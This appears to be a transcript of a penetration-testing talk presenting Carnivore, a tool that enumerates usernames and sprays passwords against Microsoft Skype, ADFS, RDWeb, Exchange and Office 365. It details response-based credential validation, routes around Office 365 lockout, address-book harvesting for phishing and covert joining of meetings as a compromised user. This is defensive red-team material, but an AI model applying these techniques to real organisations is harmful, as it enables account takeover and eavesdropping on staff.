format. So we're at navtech.nev and we'll just try summer 2020. Just to see if there happens to be a user who might have been daft enough to use that as a password. So that's going to take a second. I'm sure we're not going to find anyone because of course no one ever uses passwords like this. Who would possibly be that foolish. So here we go. If we give it another couple of seconds, you can see again, this is just doing that one username list. So obviously that's the same number of users total that it will be spraying as the smart enumeration was looking at. Search will be around about now. So there you go. So we've now uncovered one user with that password. We've used the RD web service, but obviously we could have sprayed that on any of these other services. And at the moment, looking at the internal domain information, we can probably assume that they're kind of going to be the same across all of them. Okay, so let's have a look. Let's just do one with Skype. So we should go for. So actually, so just to show you can also password spray enumerated users. So let's use that same. Okay, just 20, 19. Okay, so for that option, then we were spraying the users in the legacy format because those are the ones who've already enumerated. And for username enumeration, that's incredibly slow because for every invalid user, you might have to wait something like 20 or 30 seconds. When we're spraying this list of already enumerated users, and we kind of know already that they exist and actually that's still quite fast, even when spraying in legacy format, because you're not having to wait for every invalid user. So obviously we've now got him as well. You can see we've got this access token here. So I'll quickly show you the address book. So we'll choose this user who we've already got the access token for. Again, I'll explain in more detail some of these other settings. But for now, we're just going to let this go. See what happens. I'm also going to come back to the meeting snooper later. So this is just to kind of show the address book functionality. Here we go. And so you can see now all of these other users popping up. So we get the sick username, the email address, title, department. We can kind of tick these on and off the default settings I've got here are basically the ones we can get relatively quickly. So if I actually expand that and choose to pull some of this other information, it can take quite a long time, especially with quite a large domain. And so in this instance, we just go for the default. It's fairly quick. Obviously for my test lab, this is quite a small number of users, but there you go. You can see the general gist of what's possible with this tool. Okay, so now for some just general statistics. So first of all, I basically ran a version of this against the Alexa, well, the top 100,000 of the Alexa top a million of those 11.79% were attackable at all. And so this shows that of that 11% about 11%. So how many had each service. So obviously some could have had more than one service. This started carnivore started initially as a Skype attacking or assessment tool. So that's secretly my favorite, but you can see it's kind of still getting beaten out by exchange and ADFS, maybe not by all that much. So one caveat with the kind of cloud element here is that there are some false positives in there. And because for this assessment, I didn't explicitly check which whether they were hosted in Office 365. So this is just listing if when I made a link discover request, did it come back and say it was hosted in the cloud. So actually that number might even be higher if we have explicitly asked. And for some of them, it kind of seems to suggest that they're hosted in the cloud, but then maybe everything isn't properly configured and that services and there. It's like say the cloud kind of maybe take with a pinch of salt, but the others, that's what was found and what was kind of verified as existing. So the first part sub domain enumeration, we'll go into that in a little bit more detail. Okay, so as I said before, I split the username enumeration URL and the pass spray or the endpoint validation. Previously it bailed if the username enumeration wasn't there, but then I found multiple times. And in fact on that wider kind of mass assessment I did, then quite often you would find an organization to have just one or just the other. And so for example, here you can see actually there's 53% had a password spray endpoint over 47% with a username enumeration. So kind of 6% more had a password spray endpoint than had both. There were some that just had username enumeration. And what's interesting about this is that it means that for those organizations with just a kind of weird password spray and tele authentication endpoint somewhere, then it seems likely that they potentially might not even be aware of that because they've kind of filed off or hidden away all of the well known. The username enumeration, the standard login points, but then, you know, they have this one password spray endpoint that kind of seems to have alluded that. So yeah, that's kind of interesting. So kind of all looks for some domains in the order shown here. So the statistics are taken from that 11% of the 100,000. So hopefully it means that we'll do as few requests as possible, because obviously we're looking at the one that's highly likely to exist. And then only looking at the others if it doesn't. And so in future I might add an option for a kind of, you know, you can choose between light or full enumeration. So maybe you could choose to just look at the top two and then discount it. And yes, so then again, maybe managing to kind of cut that down even more as to how many requests you need to send. So now username enumeration and a little bit more detail. So we're going to start with the demonstration. Okay, so we've got various options here that I'm going to go through. So firstly, smart enumeration we saw before. So basically that will take these nine different formats of username taken from the top statistically likely usernames lists. And it would it will basically try the top username in each list and then the top of the next list, top of the next list. And essentially as you saw before, it's looking for three valid usernames of the same format. So that's using the timing based difference, which is fairly well known for Skype and exchange. I've added it here for ADFS and RD Web as well. So we've got this advanced option here as well that if you want, you can kind of pick a format and where you want to start in that list. Or you can leave it as it is. You can also do an individual username or you can provide your own list. And all those these pre built ones. So these are kind of standard and service accounts and Council killer was created by my colleague, Owen Bellis. So that's kind of a list of maybe fairly standard user accounts that might be in there. So you can set the password. So obviously also it works on the timing based difference and then also if you get the password right then great. So again, I will just show you obviously this is fairly similar to what we saw before. And one interesting additional point to note is additional information you can get depending on the service. So for Skype, then we can actually determine quite a bit of additional information. So SIP enabled basically just means. So actually, sorry, some of these will only come up if you get the password right as well. So SIP enabled would mean you've got the username of the password right and that user is basically set up on Skype. So account disabled, whatever password you give, you would get that if the account is disabled. You should see that in a second. Switched over. In fact, I might have re enabled that user. So basically if you get a disabled account, then essentially we won't do anything else with it because basically whatever you put in, you're not going to be able to kind of do anything. And for Skype, you can also tell if the password is expired and it's possible that you might actually then be able to take that password. And if you found an endpoint, you know, maybe for the VPN, it might be you can even kind of put that password in and it will ask you to reset it. Obviously on a test, that's probably a little bit too crazy of a thing to do, maybe for a red team or with the kind of technical point of contact, you know, green light. And then for Skype, we can also get this server error. But again, that means you've got the password right. And as I said before, you'll get the access token there if you do. And so yeah, username and emeration. Okay, so as you've just seen, smart enumeration will take nine lists of statistically likely usernames. And it will go through those until it finds three of the same and then automatically select that format and then carry on. Now one interesting thing is this difference between legacy and modern format. So legacy is domain slash username. Modern kind of email style is username at domain. So that can match that they can match, but they don't necessarily have to. And again, the modern format could match the email but doesn't necessarily have to. Now for username enumeration, we can only use the legacy format. And that's to get that timing based difference. And so one interesting thing is that that causes a little hiccup when rolling over to password spraying. So previously I used username enumeration to discover the format and then just assume that it will be the same for the modern format for when we spray. Now because technically that might not be the case, I don't do that anymore. The problem is it means on password spraying, if you choose to use the discovered username format, then invalid usernames will still take ages to do. So what I would suggest is a way of doing this because basically, yes, so username enumeration, every invalid user 30 to 40 seconds. So if you waited for that to finish anyway, that's going to take the rest of the day, a couple of days. So ideally what you want to do anyway is use username enumeration to get the potential, the likely format. That might take five minutes, say, then pause that, switch over to password spray. And then instead of using the discovered format, which because we've only discovered that in the legacy style, then that will take a long time. So instead pick the same format and password spray those. Hopefully you should get some credentials or some invalid, sorry, disabled accounts, which give you a point of that is the correct format. But if you don't, then it is possible that the formats don't match. And you might need to do a little bit more kind of manual going through different potential formats to discover which it is. So the other thing to say is that, so obviously with username enumeration, we discover a valid username, even if the password is wrong, where as the password spraying, we only find out anything if we get both correct. So you can, if you want to stay with username enumeration, you get a nice list and it takes 48 hours. However, because you will essentially be hitting the same users with the password that you're trying, then actually in terms of progressing the test, then you're not going to really lose anything by switching over to passwords spraying. You're going to be hitting the same users. So you're going to find the same users that might have password one as their password, just it will take 10 minutes instead of two days. So yeah, so that would be my suggested method. So now I'm going to show where we get the time based difference and some other things for ADFS and RD web, because I don't think there's much publicly written about those, whereas there is for Skype and Exchange. So this is maybe more interesting. So this is where we get the time based difference for ADFS. Now for ADFS, there's this extra kind of interesting extra bit, which is that it needs an MSIS SAML cookie to be sent in the request. So basically, in order to get that, I first send a request here, sorry, to the same place, but with this single sign out parameter. And basically the response to that will give us the cookie that we need, which we then here include when we make a password guess, as you can see. And then here you'll see the invalid response. So it's just 200 OK. And, you know, so that's told us nothing or with the timing difference, maybe it's told us if the user is valid. And this is a valid response. We get the 302 redirect and it sets this MSIS auth cookie. So for RD web, we make a post request like this. So there's the username and the password to this URL. And if it's invalid, then we get the 200 OK again. And for TSWA auth HTTP only cookie, then that either isn't there or it's blank. So again, we can use timing based difference with the username. Or if it's completely valid, so the username and password are correct. Again, it's the 302 redirect and that TSWA auth HTTP only cookie now has a value as shown there. So now password spraying. So as I said before, there's a little hiccup here with the discovered format. So obviously that's up to you if you want to stick with that discovered format or just simply choose it from the list and we'll spray that in the user at domain style instead. So for password spraying, it basically defaults to using that style if possible because it's quicker. And, you know, also if you provide a list of usernames, you can if you want provide it with domain slash user or user domain and it will use what you've given. So let me have a look. Yep. So also, as I said, you can use these pre built lists. If you want to go for that or you can give it a file of your own. And as I've said, if you want to, you can kind of pre add whatever you want in there and it will use that instead. So another thing to say is that if you want to, you can just go straight to password spraying. You don't have to do the username and emeration first. So yeah, basically if you've done the sub domain and emeration, you've got the internal domain information, you can just go straight here. Maybe you've done some most and you have an idea what the format might be. You can just go straight here and spray it. Okay, so now a little demonstration of password spraying. So I can show you that in a bit more detail as well. Okay, so as you can see here, the top option is use discovered username format. So if we'd already done the username and emeration, then we'd be able to basically just tip that here. And as I've said, that will spray in the legacy format. So you need to be careful. The other choice you've got is that you can just pick what list you want to spray. Again, you can spray these kind of inbuilt lists. You can give it a file of your own. And or you can also spray just enumerated users, which again, we'll use the username that we've already discovered the format that we've already discovered that user in because obviously we know that exists. So again, you can put the password in here. That's obviously distinct to the username and emeration password. And then if I click spray, you'll see that this is much quicker. Because this is able to be multi-threaded, you're not waiting to check that the kind of time based, you know, information is accurate, which multi-threading the username and emeration can kind of throw that off because you're making it do multiple ones at the same time. And as you can see, so it's gone through the list. And as we saw before, it's found this user and access token here. And we've also got one with the disabled account. Okay, so as you saw there, we've got these different columns. So for Office 365 spraying, I'll come on to how we do that at the end. But basically, if you if you if we can spray the Microsoft login portal, then we can determine a valid user versus an invalid user and valid credentials versus invalid credentials. And we can also actually tell if the if you've got the right username and password, but the organization has MFA enabled. So SIP enabled just means they have Skype access. And then depending on the service, we can tell some additional things. So again, Skype is actually my favorite service to look at, because you can actually tell the most from from Skype. So we can tell if the accounts disabled, you can tell if they're SIP enabled. And you can tell if even if the password is expired, so you've got password right, but it's expired. And also this server error, we can still tell that that's a valid username and password. And for exchange and RD web, then we can also still tell if the password is expired, or if it's correct, but not some of the additional information. So username enumeration is timing based. So I only have one location for each of those where that's possible. But for password spraying, there's multiple places we can kind of spray. So again, from the 100,000 that I looked at, that's where the statistics have come from. So this is the order in the sub domain enumeration and when we're validating if the password spray endpoints there, this is the order that kind of all the look for those in. Again, hopefully this will reduce how many requests we need to make. And in the future, again, maybe that advanced option to say just look at the top two. Obviously, you can see here, the top two would actually get the vast majority of in, you know, would have found it in the vast majority of cases. And then we've got somewhere is literally just one out of that 11% that had slash web ticket was there. And so this is a mix of known endpoints kind of publicly written about ones taken from IS from the server itself and which allow until I'm authentication. So until I'm authentication going to go into a bit more detail now. So, yes, so just to mention briefly, when I had a look there kind of doesn't seem to be that much for until I'm web based until I'm authentication spraying, it's possible hydro or something similar might do it, but they didn't seem to be that many tools for it. So here's a little bit of code. Very simple for C sharp. So we can literally just create the new network credential, give it the username and password. And then in the response, if it's 401 unauthorized, it's bad. Otherwise, you're good to go. So yeah, incredibly simple and carnivore is able to password spray until I'm off endpoints. And so for those you can still do the blank type one message. But actually, it's part of the protocol is kind of determining and including the domain name. So here when we're giving the username and password, we can literally just say see Scott password one. And actually, as part of this request, it will add the nevtech element of that. So an interesting thing to note is that, as I said before, when I included some entombed authentication endpoints with the list of sub domains that I look at, then there were some quite big organizations where everything else seemed to not be accessible. And then you've got one kind of weird until I'm off endpoint hidden away. Meaning that they're still susceptible to password spraying against the internal domain. Essentially, I mean, this could even be used for denial of service, because yes, we hit the normal password lockout policies. But essentially, if you purposefully hit that, and you know, you've locked out everyone in the domain. So that's obviously something that an organization would want to be aware of. Because that would be a bad day for them as well. So quick sidetrack into a note on some of these different services, just in case you haven't seen them before. And so ADFS, it's a portable that can be present to allow you to sign into different third party services. Sometimes these might be assumed to be internal. So on past red teams, then this has given access to full job posting applications. So third party applications, but they were linked to the company's Twitter and LinkedIn, all of their job postings. So obviously, for kind of phishing or ongoing attacks, then having access through ADFS to that company's kind of LinkedIn job postings, or even reputational damage could have been fairly troubling. So basically, you go to the same URL that I gave earlier, and that would give or would normally give a kind of drop down list where you'll see the different applications that you can authenticate into. So I've also seen internal service desks that you can get into was logging all call center queries. So that contained incredibly sensitive customer details and information, because it was everyone in their call center, putting it putting in, you know, this customer with this bank account number and this credit card number has this question. And that was basically accessible externally through ADFS and also things like HR user admin portals. And so one other thing to note there is the if it's Office 365 and federated equals win. So basically, Office 365 is password spraying avoidance and defense mechanisms are fairly brutal. But basically, if the organization is federated, it means that you not not just that you can but that you have to hit the ADFS server. And the response to a request I'll show in a bit will tell you where that ADFS server is and basically, yeah, so if that exists, it's actually a lot better for us, because it means we can avoid Office 365's robust defense mechanisms. So we're just hitting ADFS the same as we would before. And for our DP, that one's fairly simple. It's literally just remote desktop through the web. Depending on how that's configured, maybe you'll be able to RDP into a workstation and domain, you know, things like that. And yes, so hopefully you'll have seen Skype and Outlook before. Now post compromise, we're going to look at the address list pulling first with a quick demonstration. Okay, so just as a reminder, so this is used to pull the address book through the UCWA API, just to remind you what that looked like. So we had these options here. So if you untick both of those, that means you're just looking for the compromised user. So the personal contacts is the personal contacts of that compromised user. So their favorites. That's an interesting one for say ongoing social engineering, because then you know, and from the other information you've got here, then you know, okay, my compromised user has this job. My favorites include these people and they have these jobs. So in terms of kind of a fashioning of good fishing payload, then obviously that would be incredibly useful. We can kind of run this on the personal contacts first and then add in the full address list. Just to make that distinction or yes, just pick the full address list. The data here, as I said before, so the ones that are chosen by default, those are the ones that are quicker to get. So for some reason, the way that the UCWA API works, then we get different pieces of information depending on where we've queried that person. So if they're you, you get this information. If they are personal contacts, you get this information. If it's through the people search function, you get that information. So this is kind of the stripped down list of what you get in every case. Then if you want to kind of go on and pull everything back, we can. But that can take numerous additional requests per user. So obviously for a domain of say 6,000 people, that could take an incredibly long amount of time. So what we do is if we kick this off, and I've just missed the button, that's good, good sign. So you'll see it will pull back the kind of standard information for the users first, and then it will kick off some additional threads to pull that additional information. And then as we go, you'll see that start to fill in. And then I'll go over some of these things later and the additional settings here. I'll go over in more detail. Okay, so as you just saw, the information that we can get back through Skype for Business is a bit of a social engineers dream. So you've got the department, you've got the office location they work in, you've got even whether they're online or offline. Additionally, this does say online mobile online desktop. So I've never fully seen that work in a useful way, but that options there. You can also get email address phone number. And this note here is any status message that they've set. So those quite frequently I've seen people will put on there about annual leave if they're going to be out of the office. So obviously again, as far as social engineering goes, you know what office they're in, you know, the name, email address, what their job title is, you know, they're going to be out of the office. So there's a lot of information for maybe even being able to turn up and say, you know, I'm supposed to be meeting so and so or, or even impersonating someone and you know they're definitely not going to be in the office. So so I was saying the problem is some of this extra information does take a large number of additional requests. So so yeah, by all means tick all, but just beware that might take a very long time. And yeah, those are the options you've got. So carnivore pulls the internal dress book back using people search on the UC with the UC WA API. So this does mean that we're essentially having to search letter by letter a through Z. However, there's an upper limit of 100 on the amount of responses it returns. And there isn't a next link that we can say is the first 100 now go to the next link for the next, you know, however many and so on. So basically what we have to resort to is searching by digraphs and try graphs. So essentially a B a C a D and then even a B C a B D a B E. And so basically we can then take either the from the top statistically likely usernames list, we can do all of the likely and unique kind of three letters that are there, or you can do all possible to character combinations. So what's interesting and fun about the UC WA API is that there doesn't seem to be much rhyme or reason as to the way that works in terms of what we get back. So to take an example, if we're looking for every pool in the domain so we know there's four, and we search for P, you get back 150 results. So we're just going to get the top 100. There's two polls in there. So then we search for PA, we get back 20 results. But this time there's three pools. So we've got one extra. But for some reason, even though we haven't hit the upper limit, we've still not actually got back every pool who's in the domain. So then we search for PA you. And now we get this mysterious rogue fourth pool that we've never seen before. So essentially, in the interest of me keeping my sanity, I've stuck with diagrams and try graphs. It's possible you might want to go on and do quad graphs and quink graphs and whatever else they're called. However, so when I looked at this with the common try graphs, then and then with every possible three character combination that actually only added an additional I think it was maybe even one user in a domain of 6000. And the difference is common does 2249 requests, whereas every possible was about 17 and a half thousand. So all of that for one additional user that as I've said was kind of hiding away. And we weren't able to get otherwise. So essentially, hopefully that explains the kind of options on the address list a little bit more. One additional kind of side note. So it's fairly uncommon, but I've seen it where a misconfigured Microsoft Web App proxy basically meant that when you off to the first server, and it gives you back the token and then you try and use that against the applications end point. And then it's essentially sends it to the wrong place or you've been off to the wrong box. And so it then doesn't like it. That actually also stopped the legitimate Skype client from being able to authenticate, you know, to Skype. However, now carnival is able to detect that it reoffs to the correct box and carries on. So basically carnival is able to connect and carry on using the API, even when the legitimate client actually couldn't. Okay, so now the final post compromise function, which is meeting snooper. And so unfortunately my lab servers stopped working for this. So we have to make do with screenshots. Okay, so as you can see here, this is the meeting snooper tab. So once you've compromised the user, if you've got Skype available. So this uses the UCWA API as well. And then you can go here and you have to choose. You have to pick the compromised user that you want to use there. So now we can either choose basically we can do this for all compromised users or just a selected user. Now one thing to say is that this only picks up currently scheduled meetings. Obviously, so basically we can run this throughout the day multiple times or you know at the start of the day you could run it see if any new meetings have been added and then kind of keep running it to pull back new information. So first of all, it dumps the standard dial in information to the output log. So if you've ever had an email inviting you to a Skype meeting, this will look fairly familiar to you. So you've got the internal number you can dial and then a number for each country or city within that country. And so now apologies for how utterly rubbish this looks. As I said, my training lab unfortunately kind of packing in at the key moment there. But yeah, so just stress this isn't an exploit or a zero day. It's basically highlighting what's already possible through kind of weaponization of the UCWA API for attackers. Obviously it does depend on compromised credentials. But basically, so far this tool has shown how we can go from external over the internet to kind of complete compromise and to this point, being able to dump out scheduled meetings for compromised users. So one thing to say is that when kind of using this tool on on jobs, then often you find if you're going to get anyone, you probably are going to get like 50 to 100 users. And obviously, in that case, then this becomes more interesting, because you know one user might have one meeting that week. But if you've got 50 users, then maybe you've got someone who's a little bit more interesting. So you can then see here, what happens when you run this tool is that it gives you information for each meeting that compromised user has scheduled. So the conference ID there is the pin. So basically when you dial in, you dial into the phone number and ask you for a pin, and that's that conference ID. And basically that conference ID is unique to that user. So when you dial in, you'll be impersonating whoever it is that you've compromised. So for example, this you dial in, you put the pin and then you show up as being, say Chris Nevin guest. Now, obviously, if the people in the meeting are kind of using the desktop application, then maybe it would look weird to have multiple Chris Nevin guests. If everyone's using the phone to dial in, I'm not sure that they would know this is a tool at all. And in fact, even if they did see these two Chris Nevin guests, you know, how likely is it that people are going to assume, oh, this is someone impersonating and joining in and listening, as opposed to, you know, maybe there's some weird bug that's happening. So the information we get here includes the subject of the meeting and the attendees. So obviously these meetings here I've scheduled just to kind of demonstrate. But obviously this could be a lot more juicy. So for example, you've compromised the user, you know, from their address book, they're the head of financial fraud. And this meeting subject shows it's the weekly financial crime investigation update. So obviously you can see why this would be kind of concerning for an organization if this was possible. And because, again, without any exploit, any need for any further phishing or payloads being executed, you've basically gone from being over the internet to being able to listen in on and even record the sensitive meetings essentially impersonating that user. And so on the right you can see the lobby bypass enabled. That basically means that if you dial in does it bypass the lobby. If that's enabled that means you're not even in a waiting room that someone has to let you in. So the join URL. If you go to that, you can join the meeting and you can basically enter a name of your choice. So obviously one thing you could do is again, you've done the address book. And, you know, is there a social engineering angle, maybe you could kind of choose your name based on that, potentially might be more likely to get caught, whereas actually just dialing in and there being two of the compromised user is maybe less trouble in. So the another thing to say is that the API basically only seems to give the meeting expiry. So that's two weeks after the meeting ends. So carnival will take off, it will remove the two weeks for you automatically. And then it's kind of maybe you'll need to do some kind of common sense around that. So for example, you see the top meeting there. We actually have been able to pull is that the meeting ends at 1130. Now I've set the subject for that one to be the time while I was troubleshooting. So you can see that actually that meeting starts at 11. As I say, normally you wouldn't get that information, because that's the subject. So obviously, yeah, if you apply some common sense to it, then you can see, OK, the meeting ends at 1130, it probably starts at 11 or even 1030. So yeah, so that's the meeting snooping, what you get back from it, basically. So there are a couple of extra points to mention, which are that this only seems to be able to pull back self scheduled meetings. So again, doesn't fully make sense to me because obviously in outlook or something, you don't just see meetings you've scheduled, you see every meeting that you're scheduled to be a part of. Unfortunately, we're not able to get that through this tool. So yeah, and then also meeting and time only, as I said before. Now there are some weird edge cases with that. So for example, I set a recurring meeting. So the only information we get back is that it ends on the 26th of December 2022, which obviously isn't that useful. Again, maybe you could figure out, OK, that's a Friday, it's a half 10. So maybe it's every Friday. But again, we can't get that back through the API, unfortunately. Okay, so Office 365. So I'm not going to demo this. So what I've been showing so far is basically just my lab. And so yeah, we're not going to demo Office 365, but I'm going to talk you through how Carnival works. So for example, sorry, one thing to say is that username enumeration that doesn't require a password guest has been quite widely covered. So there's things like 0365 or 0365 enum. So I'm just going to quickly kind of get into password spraying and give some key pointers. So as I said before, federated as a win. So just the usual active directory rules will apply to lockouts. But again, that kind of doesn't include the extremely robust Office 365 rules. So as I've said, there's a link that I'm about to show you where you can find out if an organization is federated or not. If it is, you'll get back the ADFS server location and Carnival will add that automatically. So if it's not federated, we can still spray, sorry, we have to spray the Office portal, but then we can also determine if a user and password is valid, even if we have MFA on there. And sorry, I should have said again, with federated, if it's federated, you have to spray ADFS and you can't spray the Office portal. You won't get back anything interesting, anything useful. So password spray countermeasures for Office 365. So they have things like trusted versus untrusted network have separate bad password counts. So again, if you're from the untrusted side, which presumably you would be from an untrusted network, then, you know, your password spray is adding to account of everyone else in the world. So again, lockout is fairly frequent and quick. But from Microsoft side, obviously that's designed so that then the genuine user can still sign in while on their corporate VPN or something like that. So obviously good security measures but difficult from a red team perspective. So first of all, to find out if the organization is federated. So this is an example request here. So the username itself is relevant. It's just the domain.com that we're looking for. And the response here. So if they were federated, that would say federated instead of managed. And it can also include some kind of boilerplate text. So for example, is keep me signed in disabled. Obviously that one might be interesting from a red team perspective because maybe it hints that they have fairly good security and they've had the configuration looked at because users can't just stay signed in forever. You also get the Federation brand name there and you can get back, you know, logo information and that kind of thing. And so also if this said federated, then we would see the location of the ADFS authentication endpoint there as well. So for password spraying, this is how Carnivore does it. So this is the endpoint that we're hitting. There's the username and the password. So the client ID and the scope, obviously that could be tweaked to maybe be a little bit more realistic or representative. But this is what Carnivore uses. And so this first one is if there's an invalid password. Now obviously the actual response here says invalid username or password. So obviously that seems like maybe that's going to be a bit tricky for us. Is it the username or is it the password? We're not fully sure. But then if the username is incorrect, then we get this message back. The user account does not exist in that directory. So obviously from that we can tell the previous response means the password's wrong, not the username. And just to also mention there where it says email hidden, I've not added that. That's the actual response. So then this is a valid user and password without NFA. So again, this is specific to the request that I make in Carnivore. So because we gave a client ID that doesn't exist, then if the username and password is correct, you'd get this unauthorized client and a message that that application doesn't exist. Because obviously it's not a proper client ID. And again, so if it's valid user and password with MFA, then again we get this invalid grant. But now it's telling us that it's due to configuration meaning that you need to supply multi-factor authentication. So again, username and password is correct, but you need MFA. So outro very briefly. Yes, so almost forgot to put it in, but here's a link to the tool itself. So obviously you can go there and download the latest version and any issues or anything that you want to bring up there. I'll be happy to try and help wherever I can. So thank you for listening. Hopefully it's been useful and they enjoy carnivoring.
|
Carnivore is a username enumeration and password spraying tool for Microsoft services (Skype for Business, ADFS, RDWeb, Exchange and Office 365). It originally began as an on-premises Skype for Business enumeration/spray tool as I was finding that these days, organizations often seem to have locked down their implementations of Exchange, however, Skype for Business has been left externally accessible, and has not received as much attention from previous penetration tests due to the lack of tools as impactful as Mailsniper. Overtime this was improved and built upon to bring the same service discovery, username enumeration and password spraying capability to Skype, ADFS, RDWeb, Exchange, and O365 all in the same tool. Carnivore includes new post compromise functionality for Skype for Business (pulling the internal address list and user presence through the API), and smart detection of the username format for all services. As a practical means of entry into an organisation – numerous external penetration tests have uncovered an on-premises Skype for Business or ADFS server even for organisations that have moved Mail/SSO/etc to the cloud.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.